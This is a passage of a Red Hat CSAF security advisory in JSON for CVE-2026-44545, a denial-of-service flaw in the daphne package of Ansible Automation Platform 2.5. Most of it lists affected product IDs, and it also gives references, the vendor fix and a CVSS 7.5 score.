"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44545"
},
{
"category": "external",
"summary": "RHBZ#2484377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484377"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44545",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44545"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44545",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44545"
},
{
"category": "external",
"summary": "https://github.com/django/daphne/blob/main/CHANGELOG.txt",
"url": "https://github.com/django/daphne/blob/main/CHANGELOG.txt"
}
],
"release_date": "2026-06-03T13:17:42.907000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
